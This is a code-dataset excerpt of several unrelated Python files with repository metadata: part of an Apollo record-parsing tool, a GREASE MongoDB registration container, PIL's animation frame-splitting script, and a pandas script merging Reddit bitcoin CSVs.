OUT_FOLDER = dest_path[0] + '/'
temp_path = os.path.split(dest_path[0])
FOLDER_PREFIX = temp_path[1].replace("-", "")
parse_dict = {"params": params,
"parse_type": parse_type,
"out_folder": OUT_FOLDER,
"prefix": FOLDER_PREFIX,
"record_folder": RECORD_FOLDER}
return parse_dict
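
# Illustrative parser_params.yaml layout, inferred from the keys read above
# (values are placeholders, not taken from the original repository):
#
#   records:
#     filepath: <folder containing *.record files>
#   parse: lidar
#   lidar:
#     channel_name: <cyber channel to extract>
#     timestamp_file_extn: _lidar_timestamps.txt
#     out_folder_extn: _lidar_scans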
def define_destinations(parse_dict):
"""
define destination for extracted files
"""
dest_dict = {
"channel_name": "",
"timestamp_file": "",
"destination_folder": ""
}
parse_type = parse_dict["parse_type"]
params = parse_dict["params"]
dest_folder = parse_dict["out_folder"]
prefix = parse_dict["prefix"]
    # choose which parser function/module to import, e.g. parse_planning
parser_func = 'parse_' + parse_type
dest_dict['channel_name'] = params[parse_type]['channel_name']
dest_dict['timestamp_file'] = dest_folder + prefix + params[parse_type]['timestamp_file_extn']
dest_dict['destination_folder'] = dest_folder + \
prefix + params[parse_type]['out_folder_extn'] + '/'
if not os.path.exists(dest_dict["destination_folder"]):
os.makedirs(dest_dict["destination_folder"])
return dest_dict, parser_func
def parse_apollo_record(parse_dict, dest_dict, parser_func):
"""
"""
record_folder_path = parse_dict["record_folder"]
parse_type = parse_dict["parse_type"]
record_files = sorted(os.listdir(parse_dict["record_folder"]))
parse_timestamp = []
parse_mod = import_module(parser_func)
print("=" * 60)
print('--------- Parsing data for: ' + parse_type + ' ---------')
for rfile in record_files:
print("=" * 60)
print("parsing record file: %s" % rfile)
freader = record.RecordReader(record_folder_path + rfile)
time.sleep(.025)
for channelname, msg, datatype, timestamp in freader.read_messages():
if channelname == dest_dict["channel_name"]:
tstamp = parse_mod.parse_data(channelname, msg, dest_dict['destination_folder'])
parse_timestamp.append(tstamp)
    # write the timestamp file for the parsed channel
with open(dest_dict["timestamp_file"], 'w+') as f:
for item in parse_timestamp:
f.write("%s\n" % item)
print("=" * 60)
print('DONE: records parsed and data saved to: \n ' + dest_dict['destination_folder'])
print("=" * 60)
if __name__ == '__main__':
cyber.init()
parse_dict = read_parameters('modules/tools/record_parse_save/parser_params.yaml')
dest_dict, parser_func = define_destinations(parse_dict)
parse_apollo_record(parse_dict, dest_dict, parser_func)
cyber.shutdown()
| 32.471429 | 98 | 0.653982 |
4ca5e38670aec6fdcba92a603f6fd320a36d7318 | 3,815 | py | Python | tgt_grease/core/InversionOfControl.py | jairamd22/grease | 7ebf3df71d5c80a8ed9df44d9b64b735a9d0f899 | [
"MIT"
] | 44 | 2017-09-29T00:53:44.000Z | 2020-12-20T13:43:49.000Z | tgt_grease/core/InversionOfControl.py | jairamd22/grease | 7ebf3df71d5c80a8ed9df44d9b64b735a9d0f899 | [
"MIT"
] | 39 | 2017-09-29T10:26:10.000Z | 2019-05-02T21:07:59.000Z | tgt_grease/core/InversionOfControl.py | jairamd22/grease | 7ebf3df71d5c80a8ed9df44d9b64b735a9d0f899 | [
"MIT"
] | 26 | 2017-09-28T18:00:39.000Z | 2021-10-17T15:14:39.000Z | from tgt_grease.core import Logging
from tgt_grease.core.Connectivity import Mongo
from datetime import datetime
from bson.objectid import ObjectId
import platform
import os
class GreaseContainer(object):
"""Inversion of Control Container for objects in GREASE"""
def __init__(self, *args, **kwargs):
if args or kwargs:
self.getLogger().warning(
"Passing instances of Logger to the IOC is deprecated. Please just use getLogger().", verbose=True
)
self.__logger = None
self.__mongo = None
def getLogger(self):
"""Get the logging instance
Returns:
Logging: The logging instance
"""
if not isinstance(self.__logger, Logging):
self.__logger = Logging()
return self.__logger
def getNotification(self):
"""Get the notifications instance
Returns:
tgt_grease.core.Notifications: The notifications instance
"""
return self.getLogger().getNotification()
def getMongo(self):
"""Get the Mongo instance
Returns:
Mongo: Mongo Instance Connection
"""
if not isinstance(self.__mongo, Mongo):
self.__mongo = Mongo(self.getLogger().getConfig())
return self.__mongo
def getCollection(self, collectionName):
"""Get a collection object from MongoDB
Args:
collectionName (str): Collection to get
Returns:
pymongo.collection.Collection: Collection instance
"""
return self.getMongo()\
.Client()\
.get_database(self.getConfig().get('Connectivity', 'MongoDB').get('db', 'grease'))\
.get_collection(collectionName)
def getConfig(self):
"""Gets the Configuration Instance
Returns:
tgt_grease.core.Configuration.Configuration: the configuration instance
"""
return self.getLogger().getConfig()
def ensureRegistration(self):
"""
:return:
"""
collection = self.getCollection("JobServer")
if os.path.isfile(self.getConfig().greaseDir + 'grease.identity'):
# check to see if identity file is valid
fil = open(self.getConfig().greaseDir + 'grease.identity', 'r')
nodeId = "".join(fil.read())
fil.close()
server = collection.find_one({'_id': ObjectId(nodeId)})
if server:
# Valid registration
self.getConfig().NodeIdentity = nodeId
return True
else:
self.getLogger().warning("Invalid node identity found to exist!")
if self.getConfig().NodeIdentity == "Unknown":
# Actual registration
uid = collection.insert_one({
'jobs': 0,
'os': platform.system().lower(),
'roles': ["general"],
'prototypes': ["monitor"],
'active': True,
'activationTime': datetime.utcnow()
}).inserted_id
fil = open(self.getConfig().greaseDir + "grease.identity", "w")
fil.write(str(uid))
fil.close()
self.getConfig().NodeIdentity = uid
del collection
return True
else:
# Check the Identity is actually registered
if collection.find({'_id': ObjectId(self.getConfig().NodeIdentity)}).count():
del collection
return True
else:
self.getLogger().error("Invalid Node Identity::Node Identity Not Found", additional={
'NodeID': self.getConfig().NodeIdentity
})
del collection
return False
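
# Illustrative usage sketch (assumes a reachable MongoDB per the GREASE configuration; not part of the original module):
#
#   ioc = GreaseContainer()
#   config = ioc.getConfig()                # shared Configuration instance
#   jobs = ioc.getCollection("JobServer")   # pymongo Collection handle
#   registered = ioc.ensureRegistration()   # True once a node identity exists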
| 30.766129 | 114 | 0.563827 |
da84f821a2169001f5abe07ac1fe6d44bed0dd29 | 2,489 | py | Python | py34env/Scripts/explode.py | EKiefer/edge-starter | cc1bbac3fb7191b16eeca03b2a596d232b4ece7f | [
"MIT"
] | null | null | null | py34env/Scripts/explode.py | EKiefer/edge-starter | cc1bbac3fb7191b16eeca03b2a596d232b4ece7f | [
"MIT"
] | null | null | null | py34env/Scripts/explode.py | EKiefer/edge-starter | cc1bbac3fb7191b16eeca03b2a596d232b4ece7f | [
"MIT"
] | null | null | null | #!c:\users\ekiefer\projects\django\my_edge\py34env\scripts\python.exe
#
# The Python Imaging Library
# $Id$
#
# split an animation into a number of frame files
#
from __future__ import print_function
from PIL import Image
import os
import sys
class Interval(object):
def __init__(self, interval="0"):
self.setinterval(interval)
def setinterval(self, interval):
self.hilo = []
for s in interval.split(","):
if not s.strip():
continue
try:
v = int(s)
if v < 0:
lo, hi = 0, -v
else:
lo = hi = v
except ValueError:
i = s.find("-")
lo, hi = int(s[:i]), int(s[i+1:])
self.hilo.append((hi, lo))
if not self.hilo:
self.hilo = [(sys.maxsize, 0)]
def __getitem__(self, index):
for hi, lo in self.hilo:
if hi >= index >= lo:
return 1
return 0
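
# For reference (not part of the original script): Interval("1-3,7") matches frames 1, 2, 3 and 7;
# Interval("-5") matches frames 0 through 5; an empty specification matches every frame.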
# --------------------------------------------------------------------
# main program
html = 0
if sys.argv[1:2] == ["-h"]:
html = 1
del sys.argv[1]
if not sys.argv[2:]:
print()
print("Syntax: python explode.py infile template [range]")
print()
print("The template argument is used to construct the names of the")
print("individual frame files. The frames are numbered file001.ext,")
print("file002.ext, etc. You can insert %d to control the placement")
print("and syntax of the frame number.")
print()
print("The optional range argument specifies which frames to extract.")
print("You can give one or more ranges like 1-10, 5, -15 etc. If")
print("omitted, all frames are extracted.")
sys.exit(1)
infile = sys.argv[1]
outfile = sys.argv[2]
frames = Interval(",".join(sys.argv[3:]))
try:
# check if outfile contains a placeholder
outfile % 1
except TypeError:
file, ext = os.path.splitext(outfile)
outfile = file + "%03d" + ext
ix = 1
im = Image.open(infile)
if html:
file, ext = os.path.splitext(outfile)
html = open(file+".html", "w")
html.write("<html>\n<body>\n")
while True:
if frames[ix]:
im.save(outfile % ix)
print(outfile % ix)
if html:
html.write("<img src='%s'><br>\n" % outfile % ix)
try:
im.seek(ix)
except EOFError:
break
ix += 1
if html:
html.write("</body>\n</html>\n")
| 22.026549 | 75 | 0.541985 |
46d4ac9d6ba9a35229d0b6a5ff3743e6824f5b81 | 629 | py | Python | code/merge_reddit.py | xjohnwu/dorahacktradegeneration | a6b2fa0dbe631bae028d0d6e70663d129a37cdbc | [
"MIT"
] | null | null | null | code/merge_reddit.py | xjohnwu/dorahacktradegeneration | a6b2fa0dbe631bae028d0d6e70663d129a37cdbc | [
"MIT"
] | null | null | null | code/merge_reddit.py | xjohnwu/dorahacktradegeneration | a6b2fa0dbe631bae028d0d6e70663d129a37cdbc | [
"MIT"
] | 1 | 2018-10-20T12:34:24.000Z | 2018-10-20T12:34:24.000Z | import pandas as pd
import numpy as np
path = 'C:/dorahacktradegeneration/data'
full_data = None
files = ['bitcoin_201709.csv', 'bitcoin_201710.csv', 'bitcoin_201711.csv', 'bitcoin_201801.csv', 'bitcoin_201802.csv',
'bitcoin_201803.csv', 'bitcoin_201804.csv', 'bitcoin_201805.csv', 'bitcoin_201806.csv', 'bitcoin_201807.csv',
'bitcoin_201808.csv', 'bitcoin_201809.csv', 'bitcoin_201810.csv']
for file in files:
    data = pd.read_csv(path + "/" + file)
    if full_data is None:
        full_data = data
    else:
        full_data = full_data.append(data, ignore_index=True)
full_data.to_csv('reddit_all.csv')
| 31.45 | 119 | 0.691574 |